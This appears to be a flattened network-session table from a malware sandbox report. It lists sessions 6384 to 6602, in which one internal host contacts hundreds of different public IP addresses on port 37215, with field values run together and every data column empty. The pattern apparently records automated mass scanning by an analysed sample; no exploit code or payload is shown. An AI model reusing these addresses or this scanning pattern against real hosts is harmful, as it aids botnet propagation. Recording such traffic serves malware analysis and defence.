                                              6384192.168.2.153835031.206.197.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6385192.168.2.1559594181.188.188.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6386192.168.2.154603297.39.96.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6387192.168.2.153911894.247.124.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6388192.168.2.1552168122.113.159.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6389192.168.2.153556041.76.206.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6390192.168.2.1543026185.76.3.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6391192.168.2.1556994138.246.23.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6392192.168.2.153293837.100.36.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6393192.168.2.1550508102.74.165.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6394192.168.2.1546696181.220.147.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6395192.168.2.1552336186.164.58.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6396192.168.2.1557100121.29.47.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6397192.168.2.155176484.148.125.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6398192.168.2.155280431.100.35.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6399192.168.2.1544626121.185.160.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6400192.168.2.1542700102.59.224.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6401192.168.2.1551448190.174.129.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6402192.168.2.155809641.152.77.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6403192.168.2.153647041.222.241.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6404192.168.2.156074845.132.23.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6405192.168.2.153930637.229.253.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6406192.168.2.154968694.220.209.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6407192.168.2.1551626222.207.65.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6408192.168.2.155868094.53.134.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6409192.168.2.155228445.185.152.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6410192.168.2.1550982197.143.193.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6411192.168.2.155686231.126.210.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6412192.168.2.1544844190.4.193.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6413192.168.2.155389241.249.199.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6414192.168.2.1545730222.245.32.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6415192.168.2.1552168222.182.139.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6416192.168.2.1540664157.1.29.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6417192.168.2.1556944181.75.242.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6418192.168.2.1545418157.141.68.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6419192.168.2.1548918186.160.88.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6420192.168.2.153903645.225.123.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6421192.168.2.1533140157.90.17.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6422192.168.2.1552292222.156.123.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6423192.168.2.1544830102.168.48.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6424192.168.2.154157873.174.72.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6425192.168.2.1553934122.245.226.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6426192.168.2.1537118222.237.64.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6427192.168.2.1540870121.17.82.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6428192.168.2.1559426122.235.128.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6429192.168.2.1541536222.207.51.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6430192.168.2.155440094.221.169.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6431192.168.2.156030045.84.10.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6432192.168.2.155018845.185.12.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6433192.168.2.1557550222.168.132.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6434192.168.2.155442641.167.190.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6435192.168.2.1539958121.82.41.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6436192.168.2.1540410181.46.126.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6437192.168.2.153829094.175.188.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6438192.168.2.155136031.216.80.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6439192.168.2.1551336190.204.3.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6440192.168.2.1534778191.107.114.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6441192.168.2.154671894.224.41.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6442192.168.2.154554041.231.26.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6443192.168.2.1548752121.16.125.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6444192.168.2.155753849.178.112.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6445192.168.2.1543692121.100.195.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6446192.168.2.1555892181.65.227.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6447192.168.2.1540306190.110.54.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6448192.168.2.154224045.21.0.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6449192.168.2.1546056122.122.188.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6450192.168.2.1559938162.182.13.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6451192.168.2.1540430138.238.68.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6452192.168.2.155676631.180.25.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6453192.168.2.1538782157.58.9.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6454192.168.2.1553748156.230.34.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6455192.168.2.155506037.244.33.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6456192.168.2.154953437.136.43.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6457192.168.2.1538530181.138.243.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6458192.168.2.1558864157.38.77.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6459192.168.2.1559056122.161.32.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6460192.168.2.1559804121.244.106.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6461192.168.2.155146241.179.19.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6462192.168.2.1540362190.141.207.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6463192.168.2.1532804190.230.176.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6464192.168.2.1560838190.37.216.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6465192.168.2.1550222190.90.237.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6466192.168.2.1552218186.145.76.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6467192.168.2.1545026102.143.199.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6468192.168.2.1541450220.218.217.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6469192.168.2.1551318102.14.126.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6470192.168.2.1555156122.107.37.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6471192.168.2.154279045.92.182.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6472192.168.2.1546954186.121.9.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6473192.168.2.1538686138.222.117.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6474192.168.2.153377437.236.132.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6475192.168.2.1560500186.27.226.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6476192.168.2.1545674222.26.29.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6477192.168.2.1556214190.247.26.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6478192.168.2.1544602181.94.86.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6479192.168.2.1548290181.131.142.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6480192.168.2.1554946138.60.57.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6481192.168.2.156053845.115.164.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6482192.168.2.1557112121.253.177.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6483192.168.2.1545482157.78.226.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6484192.168.2.1534262121.36.174.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6485192.168.2.153664441.204.237.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6486192.168.2.153723437.14.47.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6487192.168.2.1547636181.4.58.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6488192.168.2.1556646121.127.3.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6489192.168.2.154080037.166.135.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6490192.168.2.1547620121.99.161.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6491192.168.2.155547237.98.30.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6492192.168.2.1536544156.230.34.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6493192.168.2.1555576197.235.115.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6494192.168.2.153617231.52.229.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6495192.168.2.1537296186.249.72.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6496192.168.2.1537084102.178.131.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6497192.168.2.155822041.114.84.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6498192.168.2.154488031.242.255.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6499192.168.2.1535972186.138.35.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6500192.168.2.155642445.184.63.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6501192.168.2.155469241.160.1.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6502192.168.2.1542200138.57.12.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6503192.168.2.155947241.169.164.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6504192.168.2.1555792138.213.89.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6505192.168.2.1547328122.254.110.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6506192.168.2.155095294.209.102.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6507192.168.2.1544494122.243.98.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6508192.168.2.156087894.49.218.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6509192.168.2.153980041.152.140.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6510192.168.2.1534110121.56.155.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6511192.168.2.1538576157.181.70.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6512192.168.2.1560854181.45.241.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6513192.168.2.1535020181.68.5.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6514192.168.2.1533562186.225.83.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6515192.168.2.1537926197.41.123.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6516192.168.2.1544848102.102.135.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6517192.168.2.1545242181.0.154.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6518192.168.2.1538766197.231.202.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6519192.168.2.1534686222.253.131.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6520192.168.2.1544540190.79.33.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6521192.168.2.1544048122.57.112.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6522192.168.2.1560084102.172.235.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6523192.168.2.156096637.177.201.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6524192.168.2.154413831.91.99.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6525192.168.2.1542108122.115.143.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6526192.168.2.1540004122.162.174.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6527192.168.2.1533026181.1.16.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6528192.168.2.1559202181.136.11.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6529192.168.2.1548922190.142.87.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6530192.168.2.153970440.246.143.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6531192.168.2.1535618157.252.166.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6532192.168.2.153299094.86.103.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6533192.168.2.155691237.87.188.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6534192.168.2.1536696190.97.111.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6535192.168.2.1538204190.144.73.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6536192.168.2.1543808122.103.125.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6537192.168.2.1556228186.231.183.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6538192.168.2.1541622157.202.109.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6539192.168.2.1553706138.230.72.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6540192.168.2.1547434122.195.115.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6541192.168.2.1540566222.64.75.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6542192.168.2.1540884190.33.30.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6543192.168.2.1552300190.95.39.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6544192.168.2.1538490186.117.142.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6545192.168.2.153501294.42.136.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6546192.168.2.1550522122.67.62.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6547192.168.2.155905437.112.185.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6548192.168.2.1552486122.65.110.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6549192.168.2.1532786156.184.202.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6550192.168.2.153882845.234.167.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6551192.168.2.1557326186.76.214.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6552192.168.2.1557158102.39.110.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6553192.168.2.1544938157.151.112.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6554192.168.2.1532860222.115.166.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6555192.168.2.155049437.234.53.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6556192.168.2.1537198138.70.45.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6557192.168.2.1555494138.28.197.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6558192.168.2.1560918181.7.93.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6559192.168.2.1534634102.114.144.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6560192.168.2.1548884138.37.163.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6561192.168.2.1535212102.23.43.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6562192.168.2.1544108102.160.137.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6563192.168.2.1552504197.169.69.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6564192.168.2.1546056102.211.239.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6565192.168.2.1537628122.225.33.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6566192.168.2.154695437.70.118.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6567192.168.2.1533832197.208.70.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6568192.168.2.154557641.142.255.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6569192.168.2.1543118181.88.234.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6570192.168.2.154245292.73.99.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6571192.168.2.1535230186.230.161.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6572192.168.2.1550496157.12.35.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6573192.168.2.155555637.45.160.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6574192.168.2.153411031.172.81.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6575192.168.2.154031831.113.35.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6576192.168.2.1554462156.232.104.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6577192.168.2.1541354156.52.154.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6578192.168.2.155660645.217.91.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6579192.168.2.1534136157.170.129.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6580192.168.2.1558222138.9.95.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6581192.168.2.1557718122.26.170.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6582192.168.2.155484841.44.224.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6583192.168.2.1540548222.69.94.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6584192.168.2.1555514181.56.65.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6585192.168.2.1536892186.90.211.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6586192.168.2.154907641.112.67.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6587192.168.2.154117237.66.104.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6588192.168.2.155114294.173.133.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6589192.168.2.1541054221.187.151.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6590192.168.2.1547410157.223.58.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6591192.168.2.1546840222.0.90.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6592192.168.2.1555356157.29.170.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6593192.168.2.1532794122.142.84.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6594192.168.2.154779031.224.227.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6595192.168.2.154259894.208.58.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6596192.168.2.1552652156.251.195.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6597192.168.2.1556442157.152.54.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6598192.168.2.153425437.143.204.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6599192.168.2.1556312190.233.138.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6600192.168.2.1551480197.52.241.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6601192.168.2.1544216197.58.129.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6602192.168.2.1554688157.131.67.21137215
